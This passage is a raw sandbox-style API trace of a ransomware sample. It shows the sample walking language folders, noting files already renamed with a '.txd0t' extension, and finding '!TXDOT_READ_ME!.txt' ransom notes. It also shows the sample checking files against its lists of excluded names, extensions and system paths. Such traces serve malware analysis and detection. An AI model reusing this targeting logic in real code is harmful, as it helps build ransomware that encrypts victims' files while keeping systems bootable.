lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5826658f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13e4a, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0114.154] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0114.154] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0114.154] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1029", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029") returned="C:\\588bce7c90097ed212\\1029" [0114.154] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\") returned="C:\\588bce7c90097ed212\\1029\\" [0114.154] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.txd0t" [0114.154] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0114.154] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0114.154] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0114.154] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0114.154] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0114.154] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1029", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029") returned="C:\\588bce7c90097ed212\\1029" [0114.154] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\") returned="C:\\588bce7c90097ed212\\1029\\" [0114.154] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" [0114.155] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0114.155] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0114.155] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0114.155] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0114.155] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0114.155] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0114.155] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0114.155] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0114.155] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0114.155] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0114.155] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0114.155] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0114.155] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0114.155] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0114.155] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0114.155] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0114.155] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0114.155] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0114.155] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0114.155] FindClose (in: hFindFile=0xec1bf0 | out: hFindFile=0xec1bf0) returned 1 [0114.155] GetProcessHeap () returned 0xe30000 [0114.155] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0114.155] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5826658f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5826658f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1030", cAlternateFileName="")) returned 1 [0114.155] StrCmpW (psz1="1030", psz2=".") returned 1 [0114.155] StrCmpW (psz1="1030", psz2="..") returned 1 [0114.155] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0114.155] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0114.155] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1030", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1030") returned="C:\\588bce7c90097ed212\\1030" [0114.155] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\windows\\system32\\") returned 0x0 [0114.155] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\windows\\syswow64\\") returned 0x0 [0114.155] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\windows\\system\\") returned 0x0 [0114.155] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\windows\\winsxs\\") returned 0x0 [0114.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\appdata\\roaming\\") returned 0x0 [0114.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\appdata\\local\\") returned 0x0 [0114.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\appdata\\locallow\\") returned 0x0 [0114.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\all users\\microsoft\\") returned 0x0 [0114.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\inetpub\\logs\\") returned 0x0 [0114.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\boot\\") returned 0x0 [0114.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\perflogs\\") returned 0x0 [0114.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\programdata\\") returned 0x0 [0114.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\drivers\\") returned 0x0 [0114.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\wsus\\") returned 0x0 [0114.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\efstmpwp\\") returned 0x0 [0114.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\$recycle.bin\\") returned 0x0 [0114.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="crypt_detect") returned 0x0 [0114.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="cryptolocker") returned 0x0 [0114.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="ransomware") returned 0x0 [0114.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="C:\\WINDOWS") returned 0x0 [0114.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="C:\\Program Files (x86)") returned 0x0 [0114.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="C:\\Program Files") returned 0x0 [0114.156] GetProcessHeap () returned 0xe30000 [0114.156] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0114.156] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1030", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030") returned="C:\\588bce7c90097ed212\\1030" [0114.156] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\*") returned="C:\\588bce7c90097ed212\\1030\\*" [0114.156] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5826658f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5826658f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1a30 [0114.156] StrCmpW (psz1=".", psz2=".") returned 0 [0114.156] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5826658f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5826658f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.156] StrCmpW (psz1="..", psz2=".") returned 1 [0114.156] StrCmpW (psz1="..", psz2="..") returned 0 [0114.156] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x580c28ce, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x580c28ce, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x580c28ce, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0114.156] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0114.156] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0114.157] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1030", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030") returned="C:\\588bce7c90097ed212\\1030" [0114.157] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\") returned="C:\\588bce7c90097ed212\\1030\\" [0114.157] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1030\\!TXDOT_READ_ME!.txt" [0114.157] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0114.157] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0114.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0114.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0114.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0114.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0114.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0114.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0114.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0114.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0114.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0114.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0114.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0114.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0114.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0114.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0114.157] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x5809c6a4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xef2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0114.157] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0114.157] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0114.157] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1030", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030") returned="C:\\588bce7c90097ed212\\1030" [0114.157] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\") returned="C:\\588bce7c90097ed212\\1030\\" [0114.157] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1030\\eula.rtf.txd0t" [0114.157] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0114.157] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0114.157] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5826658f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x131b4, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0114.157] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0114.157] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0114.157] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1030", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030") returned="C:\\588bce7c90097ed212\\1030" [0114.157] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\") returned="C:\\588bce7c90097ed212\\1030\\" [0114.157] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.txd0t" [0114.157] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0114.158] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0114.158] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0114.158] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0114.158] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0114.158] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1030", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030") returned="C:\\588bce7c90097ed212\\1030" [0114.158] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\") returned="C:\\588bce7c90097ed212\\1030\\" [0114.158] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" [0114.158] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0114.158] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0114.158] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0114.158] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0114.158] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0114.158] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0114.158] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0114.158] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0114.158] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0114.158] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0114.158] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0114.158] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0114.158] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0114.158] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0114.158] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0114.158] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0114.158] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0114.158] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0114.158] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0114.158] FindClose (in: hFindFile=0xec1a30 | out: hFindFile=0xec1a30) returned 1 [0114.158] GetProcessHeap () returned 0xe30000 [0114.158] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0114.158] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5815b20e, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5815b20e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1031", cAlternateFileName="")) returned 1 [0114.158] StrCmpW (psz1="1031", psz2=".") returned 1 [0114.158] StrCmpW (psz1="1031", psz2="..") returned 1 [0114.158] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0114.159] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0114.159] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1031", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1031") returned="C:\\588bce7c90097ed212\\1031" [0114.159] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\windows\\system32\\") returned 0x0 [0114.159] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\windows\\syswow64\\") returned 0x0 [0114.159] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\windows\\system\\") returned 0x0 [0114.159] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\windows\\winsxs\\") returned 0x0 [0114.159] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\appdata\\roaming\\") returned 0x0 [0114.159] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\appdata\\local\\") returned 0x0 [0114.159] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\appdata\\locallow\\") returned 0x0 [0114.159] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\all users\\microsoft\\") returned 0x0 [0114.159] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="\\inetpub\\logs\\") returned 0x0 [0114.159] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\boot\\") returned 0x0 [0114.159] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\perflogs\\") returned 0x0 [0114.159] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\programdata\\") returned 0x0 [0114.159] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\drivers\\") returned 0x0 [0114.159] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\wsus\\") returned 0x0 [0114.159] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\efstmpwp\\") returned 0x0 [0114.159] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch=":\\$recycle.bin\\") returned 0x0 [0114.159] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="crypt_detect") returned 0x0 [0114.159] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="cryptolocker") returned 0x0 [0114.159] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="ransomware") returned 0x0 [0114.159] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="C:\\WINDOWS") returned 0x0 [0114.159] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="C:\\Program Files (x86)") returned 0x0 [0114.159] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1031", lpSrch="C:\\Program Files") returned 0x0 [0114.159] GetProcessHeap () returned 0xe30000 [0114.159] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0114.159] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1031", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031") returned="C:\\588bce7c90097ed212\\1031" [0114.159] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\*") returned="C:\\588bce7c90097ed212\\1031\\*" [0114.159] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5815b20e, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5815b20e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1b30 [0114.159] StrCmpW (psz1=".", psz2=".") returned 0 [0114.160] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5815b20e, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5815b20e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.160] StrCmpW (psz1="..", psz2=".") returned 1 [0114.160] StrCmpW (psz1="..", psz2="..") returned 0 [0114.160] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5810ed51, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x5810ed51, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5810ed51, 